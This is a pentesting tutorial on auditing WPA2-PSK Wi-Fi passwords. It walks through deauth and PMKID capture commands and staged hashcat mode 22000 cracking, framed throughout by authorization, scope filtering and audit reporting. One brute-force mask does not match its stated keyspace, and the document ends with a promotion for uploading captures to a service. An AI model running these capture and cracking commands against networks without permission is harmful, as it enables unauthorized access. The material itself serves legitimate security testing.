WPA2-PSK password auditing is one of the most requested items on a wireless pentest scope — and one of the most legally mishandled. This guide walks the entire process from authorization paperwork through hashcat mode 22000 to a defensible findings report. Every step assumes you are operating with written permission. If you are not, stop here.
Step 0: Authorization — The Step That Keeps You Out of Prison
The Computer Fraud and Abuse Act (USA), Computer Misuse Act (UK), and equivalent legislation in virtually every jurisdiction treat unauthorized network access and traffic interception as criminal offenses. A WPA2 deauth attack and handshake capture against a network you do not own, without documented permission, is prosecutable regardless of intent.
Before touching any hardware, you need two documents signed by someone with authority over the target network:
- Scope of Work (SoW) — names the specific SSIDs, BSSIDs (MAC addresses), physical locations, and time windows in scope. Anything not listed is out of scope.
- Rules of Engagement (RoE) — specifies allowed techniques (passive capture, active deauth, PMKID, dictionary attack), data handling obligations, and who to call if you accidentally hit something you shouldn't.
Keep signed originals on file. Carry a PDF copy on the device you're using for capture. If challenged on-site by security or law enforcement, produce it immediately. Many pentesters use a single-page "Get Out of Jail" letter summarizing the engagement — your client's security contact name, mobile number, and a one-sentence authorization statement. Print it, laminate it, carry it.
Shared spaces require extra care. Cafes, co-working spaces, and office buildings with multiple tenants often have overlapping RF environments. If nearby SSIDs are not in your scope document, ensure your capture and deauth commands are strictly filtered to your target BSSID. Impacting other networks — even accidentally — can trigger legal exposure for both you and your client.
Step 1: Hardware and Environment Setup
Monitor mode and packet injection require a chipset that supports them. The driver stack on most laptops' built-in adapters does not. Recommended adapters:
- Alfa AWUS036AXML — Wi-Fi 6 (802.11ax), MediaTek MT7921AU chipset, USB-C, ~$50. Excellent Linux driver support via mt7921u in kernel 5.18+.
- Alfa AWUS036ACM — Wi-Fi 5, MT7612U, ~$35. Rock-solid for WPA2 work, slightly lower throughput ceiling.
- Hak5 WiFi Coconut — 14 simultaneous channels, purpose-built for capture, ~$100. Overkill for single-AP audits but excellent for site surveys.
Operating system: Kali Linux 2024.x or Parrot OS are the most practical choices — hcxdumptool, hcxpcapngtool, aircrack-ng, and hashcat are all packaged. A bare-metal install or a dedicated VM with USB passthrough both work. Avoid WSL2 — USB adapter passthrough is unreliable.
Step 2: Capture — Two Methods
Method A: Classic 4-Way Handshake with airodump-ng
This method captures the WPA2 4-way handshake when a client authenticates. You can wait passively for a natural connection event, or accelerate it with a targeted deauth frame (only do so if deauth is explicitly permitted in your RoE, and only against the specific BSSID/client pairs listed in scope).
# 1. Kill interfering processes, then enable monitor mode
airmon-ng check kill
airmon-ng start wlan0
# 2. Survey — note target BSSID and channel
airodump-ng wlan0mon
# 3. Targeted capture (replace values with your authorized target)
airodump-ng -c 11 \
--bssid AA:BB:CC:DD:EE:FF \
-w /captures/acme-office \
wlan0mon
# Watch top-right for "WPA handshake: AA:BB:CC:DD:EE:FF"
# 4. Optional deauth to force reauthentication (if authorized)
aireplay-ng --deauth 5 \
-a AA:BB:CC:DD:EE:FF \
-c 11:22:33:44:55:66 \
wlan0monMethod B: PMKID Capture with hcxdumptool (Preferred)
The PMKID attack, published by Jens Steube (hashcat author) in 2018, extracts a crackable hash directly from the AP's EAPOL association response — no connected client required. This is now the standard method because it is faster, more reliable, and fully passive on the AP side.
# hcxdumptool — modern PMKID + handshake capture
# Create a filter file containing only your authorized BSSID(s)
echo "AABBCCDDEEFF" > /captures/scope.txt
# Run capture, filtered to scope
hcxdumptool \
-i wlan0mon \
-o /captures/acme-pmkid.pcapng \
--filterlist_ap=/captures/scope.txt \
--filtermode=2 \
--enable_status=1
# --filtermode=2 = capture ONLY listed BSSIDs (whitelist)
# Run for 2–5 minutes; Ctrl+C when PMKID appears in status output
# Convert pcapng to hashcat 22000 format
hcxpcapngtool \
-o /captures/acme.hc22000 \
/captures/acme-pmkid.pcapngAlways use --filtermode=2 with a BSSID whitelist. Without it, hcxdumptool will attempt PMKID extraction against every visible AP. That means actively probing networks outside your scope — a legal problem even if you never attempt to crack the results. The filter flag is a one-line safeguard; use it every time.
Step 3: Crack with Hashcat Mode 22000
Hashcat mode 22000 (WPA-PMKID-PBKDF2) replaced the deprecated mode 2500 (.hccapx) and handles both PMKID hashes and 4-way handshake hashes in the same file. Feed it the .hc22000 output from hcxpcapngtool.
Attack progression matters. Start fast and cheap, escalate to expensive only if needed:
# Stage 1: Dictionary attack (rockyou.txt — 14M entries, ~12 sec on RTX 4090)
hashcat -m 22000 \
/captures/acme.hc22000 \
/wordlists/rockyou.txt \
--status --status-timer=10
# Stage 2: Dictionary + best64 rules (transforms: l33tspeak, capitalization, etc.)
hashcat -m 22000 \
/captures/acme.hc22000 \
/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
# Stage 3: Hybrid — dictionary word + 2-digit suffix (common: "Password23")
hashcat -m 22000 \
/captures/acme.hc22000 \
/wordlists/rockyou.txt \
-a 6 \
?d?d
# Stage 4: Targeted brute-force — 8-char, lowercase+digits
hashcat -m 22000 \
/captures/acme.hc22000 \
-a 3 ?l?l?l?l?l?l?d?d
# Show cracked result
hashcat -m 22000 /captures/acme.hc22000 --showOn an RTX 4090, WPA2 (PBKDF2-HMAC-SHA1 with 4096 iterations) runs at roughly 1.2 million hashes/second. Cracking a full rockyou.txt dictionary takes about 12 seconds. An 8-character lowercase+digit keyspace (~2.8 trillion combinations) would take weeks — which is exactly the point you make in the report when the password falls in stage 1.
| Attack Type | Speed (RTX 4090) | Wordlist / Keyspace | Typical Duration |
|---|---|---|---|
| Dictionary (rockyou.txt) | 1.2M H/s | 14.3M words | ~12 seconds |
| Dictionary + best64 rules | 1.2M H/s | ~900M candidates | ~12 minutes |
| Hybrid dict + ?d?d | 1.2M H/s | ~1.4B candidates | ~20 minutes |
| Brute-force 8-char ?l?d | 1.2M H/s | ~2.8T candidates | ~27 days |
Step 4: Safe Handling of Results
The recovered plaintext password is sensitive data. Treat it accordingly:
- Encrypt at rest — store the .hc22000 file and any cracked output on an encrypted volume (LUKS, VeraCrypt). Do not store on cloud drives not explicitly authorized by the client.
- Redact in client-facing deliverables — the report body shows the password length, character class breakdown, and time-to-crack. The actual plaintext goes in a password-protected PDF appendix delivered separately to the named security contact only.
- Retention and destruction — agree a retention period in the RoE (typically 30–90 days post-engagement). After that period, securely wipe the capture files and cracked hashes. Document the destruction date.
- Change notification — the first action item after delivery is immediate password rotation. Make this explicit in the report executive summary.
Step 5: Documenting Findings for a Formal Audit Report
A WPA2 crack result is only useful if it translates into a documented, actionable finding. Auditors and compliance reviewers need to see methodology, not just outcome. A well-structured finding entry includes:
Finding Structure
- Finding ID & Title — e.g. WIFI-001: Weak WPA2-PSK Pre-Shared Key
- Severity — Critical (password cracked in <60 seconds), High (cracked <24 hours), Medium (cracked <7 days), Low (not cracked within attack window)
- Affected Asset — SSID name, BSSID, physical location
- Evidence — timestamp of capture, hashcat command line used, wordlist name and SHA-256 hash (for reproducibility), time-to-crack, hardware spec
- Regulatory Mapping — ISO 27001 A.8.20 (Networks Security), NIS2 Art. 21 (security of network and information systems), SOC 2 CC6.6 (logical access controls)
- Remediation — migrate to WPA3-Personal (SAE) where hardware supports it; if WPA2-only, enforce a PSK of ≥20 random characters from a password manager, or migrate to WPA2-Enterprise with 802.1X authentication
- Remediation Effort — Low (router admin panel change, <30 min) to Medium (WPA3 hardware refresh, 1–2 weeks)
Use wifiaudit.io to generate the compliance report automatically. Upload your .pcapng capture via the API and receive a structured PDF with SSID analysis, protocol audit, PMKID exposure status, regulatory control mappings, and severity-ranked remediation recommendations — in under two minutes. The report is formatted for direct inclusion in formal audit deliverables.
Common Mistakes That Invalidate Findings
Even technically solid work can be thrown out if the process is sloppy. Reviewers and legal teams look for:
- No chain of custody — if you cannot prove the capture file was not modified between collection and analysis, the finding is contestable. Hash your .pcapng immediately after capture:
sha256sum capture.pcapng > capture.pcapng.sha256and include both in your deliverable. - Undated or unsigned authorization — a screenshot of a Slack message does not constitute written authorization. Use a PDF with a wet or DocuSign signature and a date.
- Out-of-scope captures in the file — if your .pcapng contains EAPOL frames from BSSIDs not listed in scope (because you forgot the whitelist filter), some clients will refuse to accept the report. Always filter.
- Wordlist not documented — "we ran a dictionary attack" is not enough. Name the wordlist, version, and source URL. Reproducibility is a core audit requirement.
FAQ
Is cracking WPA2-PSK illegal?
Without explicit written authorization from the network owner, yes — it is illegal in virtually every jurisdiction. The interception of wireless frames and offline password cracking both fall under computer fraud statutes. With a signed SoW and RoE in hand, it is a standard and well-recognized penetration testing technique.
What hashcat mode is used for WPA2 cracking?
Mode 22000 (WPA-PMKID-PBKDF2). It handles both PMKID hashes and 4-way handshake hashes in the same .hc22000 file format, produced by hcxpcapngtool. The older mode 2500 (.hccapx) is deprecated — don't use it for new engagements.
How long does it take to crack a WPA2 password with hashcat?
On a single RTX 4090: a full rockyou.txt dictionary exhausts in about 12 seconds. Dictionary plus best64 rules takes roughly 12 minutes. A random 12+ character password mixing upper, lower, digits, and symbols is effectively out of reach with current consumer hardware — which is the remediation argument you put in the report.
How should WPA2 cracking results be documented in an audit report?
Document the exact command, wordlist name and SHA-256 hash, hardware spec, time-to-crack, and the recovered password length and character class breakdown. The plaintext itself goes in a password-protected confidential appendix. Map the finding to ISO 27001 A.8.20, NIS2 Art. 21, or SOC 2 CC6.6 as applicable, and include a severity rating and concrete remediation steps.
Turn Your Captures Into Compliance-Ready Reports
Upload a .pcapng or .cap file and get a structured PDF audit report with regulatory mappings, severity ratings, and remediation steps — ready to drop into your pentest deliverable.
Get API Key — 3 Audits Free